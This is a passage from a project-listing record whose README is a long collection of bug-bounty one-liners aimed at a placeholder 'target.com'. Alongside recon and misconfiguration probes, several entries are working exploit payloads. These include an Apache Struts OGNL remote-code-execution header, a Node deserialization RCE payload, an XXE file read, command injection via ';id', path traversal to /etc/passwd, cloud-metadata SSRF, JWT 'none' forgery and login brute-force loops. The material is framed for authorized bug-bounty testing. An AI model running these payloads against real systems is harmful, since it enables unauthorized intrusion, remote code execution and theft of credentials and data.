misconfiguration/cognito-detect.yaml -o aws_cognito_misconfig.txt\n```\n\nScan for Open Cloud Storage Buckets (GCP/Azure)\n```bash\ncat subdomains.txt | nuclei -t exposed-storage/ -o cloud_buckets_exposed.txt\n```\n\nFind Sensitive Files via URL Fuzzing\n```bash\nffuf -u FUZZ -w wordlists/sensitive-files.txt -mc 200 -o sensitive_files_found.txt\n```\n\nDetect Open Prometheus Panels (Monitoring Exposure)\n```bash\ncat subdomains.txt | httpx -silent -path /graph -mc 200 -o prometheus_exposed.txt\n```\n\nFind Open Redirection in APIs\n```bash\ncat subdomains.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects_apis.txt\n```\n\nDetect Misconfigured CORS (Any Origin Allowed)\n```bash\ncat subdomains.txt | httpx -silent -H \"Origin: https://evil.com\" -fr \"access-control-allow-origin: https://evil.com\" -o misconfigured_cors.txt\n```\n\nDetect Backup Archives (Zip/Tar Files)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/backup.tar.gz\\n/site-backup.zip') -mc 200 -o backup_archives_found.txt\n```\n\nFind Exposed Debug Logs (Stack Traces, Errors)\n```bash\ncat subdomains.txt | httpx -silent -path /debug.log -mc 200 -o debug_logs_exposed.txt\n```\n\nScan for SSRF via Parameter Fuzzing\n```bash\ncat subdomains.txt | gf ssrf | qsreplace 'http://169.254.169.254/latest/meta-data/' | httpx -silent -fr 'ami-id\\|instance-id' -o ssrf_targets.txt\n```\n\nIdentify Server Headers for Misconfig Analysis\n```bash\ncat subdomains.txt | httpx -silent -sc -H 'X-Check: true' -o headers_info.txt\n```\n\nDetect Missing Security Headers (Hardening Issues)\n```bash\ncat subdomains.txt | nuclei -t security-misconfiguration/ -o missing_security_headers.txt\n```\n\nFind Exposed WordPress Debug Logs\n```bash\ncat subdomains.txt | httpx -silent -path /wp-content/debug.log -mc 200 -o wordpress_debug_log.txt\n```\n\nDetect Exposed GITLAB CI Files (Pipeline Secrets)\n```bash\ncat subdomains.txt | httpx -silent -path 
/.gitlab-ci.yml -mc 200 -o gitlab_ci_exposed.txt\n```\n\nFind API Keys Leaked in JS Files\n```bash\nkatana -list subdomains.txt -silent -js | grep -E 'apiKey|client_secret|access_token' \u003e api_keys_leaked.txt\n```\n\nDetect Old PHPMyAdmin Panels (Known Vulns)\n```bash\ncat subdomains.txt | httpx -silent -path /phpmyadmin/ -mc 200 -o phpmyadmin_found.txt\n```\n\nIdentify Exposed Kibana Panels (Log Monitoring)\n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o kibana_panels_exposed.txt\n```\n\nScan for Path Traversal (../../etc/passwd)\n```bash\ncat subdomains.txt | gf lfi | qsreplace '../../etc/passwd' | httpx -silent -fr 'root:x' -o path_traversal_found.txt\n```\n\nFind Open Admin Panels (Unprotected Login)\n```bash\ncat subdomains.txt | nuclei -t exposed-panels/ -o admin_panels_exposed.txt\n```\n\nDetect Known CVEs via Nuclei (Automated Vuln Scan)\n```bash\nnuclei -l subdomains.txt -t cves/ -o known_cves_found.txt\n```\n\nIdentify Unsafe Redirects (via Location Header)\n```bash\ncat subdomains.txt | httpx -silent -sc -o redirects.txt \u0026\u0026 cat redirects.txt | grep 'Location:' | grep -i 'http'\n```\n\nFind Kubernetes Dashboard Exposures\n```bash\ncat subdomains.txt | httpx -silent -path /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ -mc 200 -o k8s_dashboard_exposed.txt\n```\n\nExposed Swagger / API Documentation  \n```bash\ncurl -s https://target.com/swagger.json\n```\n\nAdmin Panel Discovery (CMS Detection)  \n```bash\ncurl -s https://target.com/admin/ | grep -i 'cms'\n```\n\nGCP Metadata SSRF Check  \n```bash\ncurl \"https://target.com/?url=http://metadata.google.internal/computeMetadata/v1/\" -H 'Metadata-Flavor: Google'\n```\n\nAzure Metadata Leak via SSRF  \n```bash\ncurl \"https://target.com/?url=http://169.254.169.254/metadata/instance?api-version=2021-01-01\" -H \"Metadata: true\"\n```\n\nOAuth Token Leak in Referrer  \n```bash\ncurl -I https://target.com/oauth/callback?code=abcd1234\n```\n\nAWS Keys 
Hunt in Public Repos (with GitHub CLI)  \n```bash\ngh search code \"AWS_ACCESS_KEY_ID\" --language python --limit 100\n```\n\nIDOR via Incrementing Document IDs  \n```bash\nfor id in $(seq 1 100); do curl -s https://target.com/documents/$id; done\n```\n\nSensitive Backup File Discovery  \n```bash\ncurl -I https://target.com/config.bak\n```\n\nJWT Key Disclosure via Well-Known File  \n```bash\ncurl -s https://target.com/.well-known/jwks.json\n```\n\nMobile Deep Link Misconfig Check  \n```bash\nadb shell am start -a android.intent.action.VIEW -d \"target://app/link?param=test\"\n```\n\nTesting Rate Limiting (Brute Force)  \n```bash\nseq 1 1000 | xargs -P10 -I{} curl -X POST \"https://target.com/api/login\" -d 'user=admin\u0026password=wrong{}'\n```\n\nClient-Side Security Headers Audit  \n```bash\ncurl -I https://target.com | grep -Ei 'strict-transport|content-security|x-frame'\n```\n\nSession Fixation Check  \nReuse session after login/logout:  \n```bash\ncurl -c cookies.txt https://target.com/login \u0026\u0026 curl -b cookies.txt https://target.com/dashboard\n```\n\nExposed Debug Endpoints  \n```bash\ncurl -s https://target.com/debug/vars\n```\n\nDirect Database Query via GraphQL  \n```bash\ncurl -X POST https://target.com/graphql -d '{\"query\":\"{users{username,password}}\"}'\n```\n\nDNS Zone Transfer Misconfig (AXFR)  \n```bash\ndig axfr target.com @ns1.target.com\n```\n\nMisconfigured CNAME Takeover  \n```bash\ndig cname subdomain.target.com\n```\n\nLFI via Parameter Tampering  \n```bash\ncurl \"https://target.com/page?file=../../../../etc/passwd\"\n```\n\nWebSocket Security Check (Frame Injection)  \n```bash\nwscat -c ws://target.com/socket\n```\n\nSensitive Parameter Brute Force  \n```bash\ncat params.txt | xargs -I{} curl -s \"https://target.com/?{}=test\"\n```\n\nGraphQL Introspection Check  \n```bash\ncurl -X POST https://target.com/graphql -d '{\"query\":\"{__schema{types{name}}}\"}'\n```\n\nPublic GitHub Secrets Hunt  \n```bash\ngh search code 
\"api_key\" --repo target/repo\n```\n\nCSP Bypass Discovery  \n```bash\ncurl -I https://target.com | grep -i content-security-policy\n```\n\nKubernetes Dashboard Exposure  \n```bash\ncurl -k https://target.com/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/\n```\n\nGoogle Dorking One-Liner  \n```bash\nxdg-open \"https://www.google.com/search?q=site:target.com filetype:env\"\n```\n\nFirebase Database Exposure Check  \n```bash\ncurl -s https://target.firebaseio.com/.json\n```\n\nHeader Injection Test  \n```bash\ncurl -I \"https://target.com/%0D%0AX-Test:evil\"\n```\n\nAWS S3 Bucket Direct List  \n```bash\ncurl https://target.s3.amazonaws.com/\n```\n\nTest SSRF via Redirect  \n```bash\ncurl \"https://target.com/redirect?url=http://169.254.169.254\"\n```\n\nTest Command Injection via Headers  \n```bash\ncurl -H \"User-Agent: ;id\" https://target.com/\n```\n\nExposed Git Folder  \n```bash\ncurl -s https://target.com/.git/config\n```\n\nGCP Storage Bucket Exposure  \n```bash\ncurl -s https://storage.googleapis.com/target-bucket-name/\n```\n\nOpen Redirect Discovery  \n```bash\ncurl -I \"https://target.com/redirect?url=https://evil.com\"\n```\n\nFast Path Traversal Discovery  \n```bash\ncurl \"https://target.com/download?file=../../../../etc/passwd\"\n```\n\nTesting File Upload Handling  \n```bash\ncurl -F \"file=@/etc/passwd\" https://target.com/upload\n```\n\nSubdomain Takeover Check (CNAME)  \n```bash\ndig cname sub.target.com\n```\n\nCheck for Anonymous FTP Access  \n```bash\nftp target.com\n```\n\nBackup Files Finder  \n```bash\ncurl -I https://target.com/index.php.bak\n```\n\nCloudFront Misconfiguration Detection  \n```bash\ncurl -I https://target.cloudfront.net\n```\n\nPublic Trello/Slack Links in Code  \n```bash\ngh search code \"trello.com/b/\" --repo target/repo\n```\n\nEmail Spoofing via Misconfigured SPF  \n```bash\ndig txt target.com\n```\n\nWeak JWT Secret Guessing  \n```bash\necho -n 'eyJhbGciOiAiSFMyNTYifQ.eyJ1c2VyIjogImFkbWluIn0' 
| base64 -d\n```\n\nTest for Public Firebase Storage  \n```bash\ncurl -s https://target.firebaseio.com/.json\n```\n\nUnrestricted File Download (Insecure Direct Object Reference)  \n```bash\ncurl -s https://target.com/files/1.pdf\n```\n\nDiscover Admin Portals  \n```bash\ngobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n```\n\nCheck for Debug Endpoints  \n```bash\ncurl -s https://target.com/debug/vars\n```\n\n**Server Header Disclosure**  \n```bash\ncurl -I https://target.com | grep Server\n```\n\n**Find Exposed GitHub Actions Secrets**  \n```bash\ngh api repos/target/repo/actions/secrets\n```\n\n**Test Blind XSS via User-Agent**  \n```bash\ncurl -A \"\u003cscript\u003ealert(document.domain)\u003c/script\u003e\" https://target.com/\n```\n\n**Test for PHP Info Disclosure**  \n```bash\ncurl -s https://target.com/phpinfo.php\n```\n\n**Exposed Kubernetes Dashboard via Proxy**  \n```bash\ncurl -k https://target.com/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/\n```\n\n**GraphQL Schema Discovery**  \n```bash\ncurl -X POST https://target.com/graphql -d '{\"query\":\"{__schema{types{name}}}\"}'\n```\n\n**Check for Exposed AWS Lambda Function**  \n```bash\ncurl -s https://target.com/.netlify/functions/\n```\n\n**Sensitive Parameter Fuzzing**  \n```bash\nffuf -u https://target.com/?FUZZ=test -w params.txt\n```\n\n**Detect Misconfigured CORS**  \n```bash\ncurl -I -H \"Origin: https://evil.com\" https://target.com\n```\n\n**Check for Weak JWT Tokens (None Algorithm)**  \n```bash\ncurl -s https://target.com/api -H \"Authorization: Bearer eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.\"\n```\n\n**Exposed .env Files (Sensitive Config)**  \n```bash\ncurl -s https://target.com/.env\n```\n\n**Sensitive GitHub Issues (Bug Bounty Targets)**  \n```bash\ngh issue list --repo target/repo --search \"security\"\n```\n\n**Exposed Internal IP Disclosure via Headers**  \n```bash\ncurl -I https://target.com | grep -i 
'x-originating-ip\\|x-forwarded-for'\n```\n\n**Reverse Proxy Bypass Tricks**  \n```bash\ncurl -I https://target.com/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd\n```\n\n**Check for SSRF via Open Redirects**  \n```bash\ncurl \"https://target.com/redirect?url=http://burpcollaborator.net\"\n```\n\n**Check for Command Injection in Parameters**  \n```bash\ncurl \"https://target.com/ping?host=127.0.0.1;id\"\n```\n\n**Test for XML External Entity (XXE)**  \n```bash\ncurl -X POST https://target.com/upload -d '\u003c!DOCTYPE foo [ \u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\"\u003e ]\u003e\u003cfoo\u003e\u0026xxe;\u003c/foo\u003e'\n```\n\n**Test for Server-Side Template Injection (SSTI)**  \n```bash\ncurl \"https://target.com/render?template={{7*7}}\"\n```\n\n**Sensitive File Leak Check (.DS_Store, .bak)**  \n```bash\ncurl -I https://target.com/.DS_Store\n```\n\n**DNS Takeover Discovery**  \n```bash\nhost -t cname sub.target.com\n```\n\n**Test for Misconfigured CORS (Wildcard Origin)**  \n```bash\ncurl -I -H \"Origin: https://evil.com\" https://target.com\n```\n\n**Directory Traversal with Double Encoding**  \n```bash\ncurl \"https://target.com/download?file=%252E%252E%252F%252E%252E%252Fetc%252Fpasswd\"\n```\n\n**Check for Exposed Configuration Files**  \n```bash\ncurl -s https://target.com/wp-config.php\n```\n\n**Find Environment Variables in Responses**  \n```bash\ncurl -s https://target.com | grep -E 'AWS_ACCESS_KEY|DB_PASSWORD'\n```\n\n**Check for Misconfigured Security Headers**  \n```bash\ncurl -I https://target.com | grep -i \"X-Frame-Options\\|Content-Security-Policy\\|Strict-Transport-Security\"\n```\n\n**Test for Gopher SSRF**  \n```bash\ncurl \"https://target.com/?url=gopher://127.0.0.1:6379/_INFO\"\n```\n\n**Open Admin Panels Discovery**  \n```bash\ngobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,aspx\n```\n\n**Exposed Docker API**  \n```bash\ncurl -s 
http://target.com:2375/containers/json\n```\n\n**Check for Log Injection**  \n```bash\ncurl \"https://target.com/login?username=%0a%0dINJECTEDLOG\u0026password=test\"\n```\n\n**Test for Prototype Pollution**  \n```bash\ncurl \"https://target.com/api?__proto__[polluted]=true\"\n```\n\n**Exposed Backup Files via Common Extensions**  \n```bash\ncurl -I https://target.com/index.php~\n```\n\n**Check for Arbitrary File Read (Java Web Apps)**  \n```bash\ncurl -s https://target.com/admin/..;/WEB-INF/web.xml\n```\n\n**Check for Error-Based SQL Injection**  \n```bash\ncurl \"https://target.com/product?id=1'\"\n```\n\n**Check for Misconfigured Exposed GitLab/GitHub Pages**  \n```bash\ncurl -I https://target.com/.gitlab-ci.yml\n```\n\n**Find Public S3 Buckets in JavaScript Files**  \n```bash\ncurl -s https://target.com/app.js | grep \"s3.amazonaws.com\"\n```\n\n**Test for Apache Struts RCE (Legacy)**  \n```bash\ncurl -X POST -H \"Content-Type: %{(#_=‘multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘id’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,‘/c’,#cmd}:{‘/bin/sh’,‘-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}\" https://target.com/upload.action\n```\n\n**Detect Java Deserialization (CommonsCollections)**  \n```bash\ncurl -X POST -H \"Content-Type: application/x-java-serialized-object\" --data-binary @exploit.ser https://target.com/upload\n```\n\n**Exposed Jenkins Console**  \n```bash\ncurl -s https://target.com/script\n```\n\n**Insecure Cookie 
Handling Check**  \n```bash\ncurl -I https://target.com | grep -i Set-Cookie\n```\n\n### 💻 Ultimate Bug Bounty One-Liners - Part 4\n\n**Find API Endpoints Directly from Web Responses**  \n```bash\ncurl -s https://target.com | grep -oE 'https?://[^\"]+/api/[^\"]+' | sort -u\n```\n\n**Find Hardcoded Secrets in JS Files**  \n```bash\ncurl -s https://target.com/app.js | grep -E \"apikey|token|password|secret|client_id\"\n```\n\n**Detect GraphQL Endpoints Automatically**  \n```bash\ncurl -I https://target.com/graphql\n```\n\n**Test for Insecure Deserialization via JSON**  \n```bash\ncurl -X POST https://target.com/api/v1/process -H \"Content-Type: application/json\" -d '{\"user\":\"_$$ND_FUNC$$_function(){require(\\\"child_process\\\").exec(\\\"id\\\")}()\"}'\n```\n\n**Detect AWS Keys Leaked in Source**  \n```bash\ncurl -s https://target.com/app.js | grep -E \"AKIA[0-9A-Z]{16}\"\n```\n\n**Check for Insecure Direct Object Reference (IDOR)**  \n```bash\ncurl \"https://target.com/api/v1/users/1234\" -b \"session=your_cookie_here\"\n```\n*Change 1234 to 1233 or 1235 and see if you access other user data.*\n\n**Test for JWT None Algorithm Vulnerability**  \n```bash\necho '{\"alg\":\"none\",\"typ\":\"JWT\"}' | base64 | tr -d '=' | tr '/+' '_-' | tr -d '\\n' | xargs -I % curl -H \"Authorization: Bearer %.eyJ1c2VyIjoiYWRtaW4ifQ.\" https://target.com/api/private\n```\n\n**Find Sensitive Pages via Archive.org**  \n```bash\ncurl -s \"http://web.archive.org/cdx/search/cdx?url=*.target.com/*\u0026output=text\u0026fl=original\u0026collapse=urlkey\" | grep -E \"backup|admin|.sql|.env|.git\"\n```\n\n**Test for Server-Side Request Forgery (Advanced)**  \n```bash\ncurl \"https://target.com/api/fetch?url=http://burpcollaborator.net\"\n```\n\n**Auto-Scan for CVEs (Nuclei FTW)**  \n```bash\nnuclei -u https://target.com -t cves/\n```\n\n**Detect Prototype Pollution in Query Strings**  \n```bash\ncurl 
\"https://target.com/api?__proto__[exploit]=polluted\"\n```\n\n**Test for Cache Poisoning**  \n```bash\ncurl -H \"X-Forwarded-Host: evil.com\" https://target.com\n```\n\n**Find Misconfigured S3 Buckets via Subdomains**  \n```bash\nhost -t cname files.target.com | grep amazonaws\n```\n\n**Check for HTTP Parameter Pollution (HPP)**  \n```bash\ncurl \"https://target.com/login?user=admin\u0026user=guest\"\n```\n\n**Test for Open S3 Buckets Directly**  \n```bash\naws s3 ls s3://target-bucket-name --no-sign-request\n```\n\n**Search for Exposed GitHub Tokens in Source**  \n```bash\ncurl -s https://target.com/app.js | grep -E 'ghp_[a-zA-Z0-9]{36}'\n```\n\n**Test for Business Logic Bypass (Rate Limit)**  \n```bash\nfor i in {1..100}; do curl -X POST https://target.com/api/v1/reset-password; done\n```\n\n**Detect Information Disclosure via Debug Headers**  \n```bash\ncurl -I https://target.com | grep -i \"debug\\|x-powered-by\\|server\"\n```\n\n**Detect Unsafe Cross-Origin Resource Sharing (CORS)**  \n```bash\ncurl -I -H \"Origin: https://evil.com\" https://target.com\n```\n\n**Auto-Find Secrets in Git Repos (GitLeaks)**  \n```bash\ngitleaks detect --source=https://github.com/target/repo.git\n```\n\n**Detect Open Redirect via Path Injection**  \n```bash\ncurl \"https://target.com/redirect?next=//evil.com\"\n```\n\n**Find Subdomain Takeover with Subfinder + Nuclei**  \n```bash\nsubfinder -d target.com | nuclei -t takeover/\n```\n\n**Test for SOAP Injection (If SOAP API Detected)**  \n```bash\ncurl -X POST https://target.com/soap -d '\u003c?xml version=\"1.0\"?\u003e\u003csoap:Envelope\u003e\u003csoap:Body\u003e\u003cexploit\u003e\u003c![CDATA[1 or 1=1]]\u003e\u003c/exploit\u003e\u003c/soap:Body\u003e\u003c/soap:Envelope\u003e'\n```\n\n**Detect Weak JWT Secrets (Bruteforce)**  \n```bash\njwt-tool eyJhbGciOiJ... 
--brute --wordlist=/usr/share/wordlists/rockyou.txt\n```\n\n**Exposed ENV Files via .env**  \n```bash\ncurl -s https://target.com/.env\n```\n\n**Check for Cloud Metadata Exposure (AWS/GCP/Azure)**  \n```bash\ncurl -H \"Host: 169.254.169.254\" https://target.com\n```\n\n**Detect Command Injection via Parameter Fuzzing**  \n```bash\ncurl 'https://target.com/ping?ip=127.0.0.1;id'\n```\n\n**Test for Fast Redirect Bypass (Open Redirect)**  \n```bash\ncurl \"https://target.com/redirect?url=//evil.com\"\n```\n\n**Detect Path Traversal in Parameters**  \n```bash\ncurl \"https://target.com/api/v1/files?path=../../../../etc/passwd\"\n```\n\n**Look for Exposed Kubernetes Dashboard**  \n```bash\ncurl -I https://target.com/k8s/\n```\n\n**Find Rate Limit Issues in Password Reset API**  \n```bash\nseq 1 100 | xargs -I % -P 20 curl -X POST https://target.com/api/v1/reset\n```\n\n**Test HTTP Smuggling with CRLF Injection**  \n```bash\nprintf \"GET / HTTP/1.1\\r\\nHost: target.com\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n0\\r\\n\\r\\nG\\r\\n\\r\\n\" | nc target.com 80\n```\n\n**Detect Client-Side Storage Leaks (localStorage/sessionStorage)**  \n```bash\ncurl -s https://target.com/app.js | grep -i \"localStorage\\|sessionStorage\"\n```\n\n**Check for Blind SSRF via PDF Generation**  \n```bash\ncurl -X POST https://target.com/api/generate-pdf -d '{\"url\":\"http://your-collaborator.burpcollaborator.net\"}'\n```\n\n**Test for Misconfigured CSP (Content Security Policy)**  \n```bash\ncurl -I https://target.com | grep -i \"content-security-policy\"\n```\n\n**Detect Unauthenticated Admin Panels**  \n```bash\ncurl -I https://target.com/admin/\n```\n\n**Check for Web Cache Deception**  \n```bash\ncurl -I https://target.com/logout.jpg\n```\n\n**Look for Backup Files Exposed**  \n```bash\ncurl -I https://target.com/config.php.bak\n```\n\n**Scan for Parameter Pollution (HPP)**  \n```bash\ncurl \"https://target.com/api?user=admin\u0026user=guest\"\n```\n\n**Detect JWT Injection**  
\n```bash\ncurl -H \"Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoibWVAdmUuY29tIn0.\" https://target.com/api/user\n```\n\n**Check for Broken Object Level Authorization (BOLA)**  \n```bash\ncurl \"https://target.com/api/v1/orders/1001\" -b \"session=your-cookie\"\n```\nChange 1001 to 1002, 1003 and see if you can access others' data.\n\n**Test for Insecure Redirect via Referer Header**  \n```bash\ncurl -H \"Referer: https://evil.com\" https://target.com\n```\n\n**Identify Leaked API Documentation**  \n```bash\ncurl -s https://target.com/api/docs/\n```\n\n**Test for GraphQL Batch Query Abuse**  \n```bash\ncurl -X POST https://target.com/graphql -d '{\"query\":\"{user(id:1) {name} user(id:2) {name} user(id:3) {name}}\"}'\n```\n\n**Find Misconfigured CORS (Advanced)**  \n```bash\ncurl -I -H \"Origin: https://evil.com\" https://target.com\n```\n\n**Check for WebSockets Injection**  \n```bash\nwscat -c ws://target.com/socket\n```\n\n**Search for Backup Directories in Wayback**  \n```bash\ncurl -s \"http://web.archive.org/cdx/search/cdx?url=*.target.com/*\u0026output=text\u0026fl=original\u0026collapse=urlkey\" | grep -iE \"\\.bak|\\.old|\\.zip\"\n```\n\n**Find Laravel .env Exposure**  \n```bash\ncurl -s https://target.com/.env\n```\n\n**Detect Exposed Debug Pages (Laravel, Symfony, etc)**  \n```bash\ncurl -I https://target.com/_profiler/\n```\n\n**Check for Misconfigured Proxy Headers (IP Spoofing)**  \n```bash\ncurl -H \"X-Forwarded-For: 127.0.0.1\" https://target.com/admin/\n```\n\n**Look for API Key in Mobile App Files**  \n```bash\ncurl -s https://target.com/app.apk | strings | grep -i \"apikey\\|token\"\n```\n\n**Scan for WAF Bypass via Encoding**  \n```bash\ncurl --path-as-is \"https://target.com/%2e%2e/%2e%2e/admin/\"\n```\n\n**Test for Host Header Injection**  \n```bash\ncurl -H \"Host: evil.com\" https://target.com\n```\n\n**Look for S3 Bucket Leaks in JS**  \n```bash\ncurl -s https://target.com/app.js | grep -i 
\"s3.amazonaws.com\"\n```\n\n**Detect File Upload Vulnerabilities**  \n```bash\ncurl -F \"file=@evil.php\" https://target.com/upload\n```\n","funding_links":["https://ko-fi.com/yogsec","https://buymeacoffee.com/yogsec"],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyogsec%2Fonelinerbounty","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fyogsec%2Fonelinerbounty","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyogsec%2Fonelinerbounty/lists"}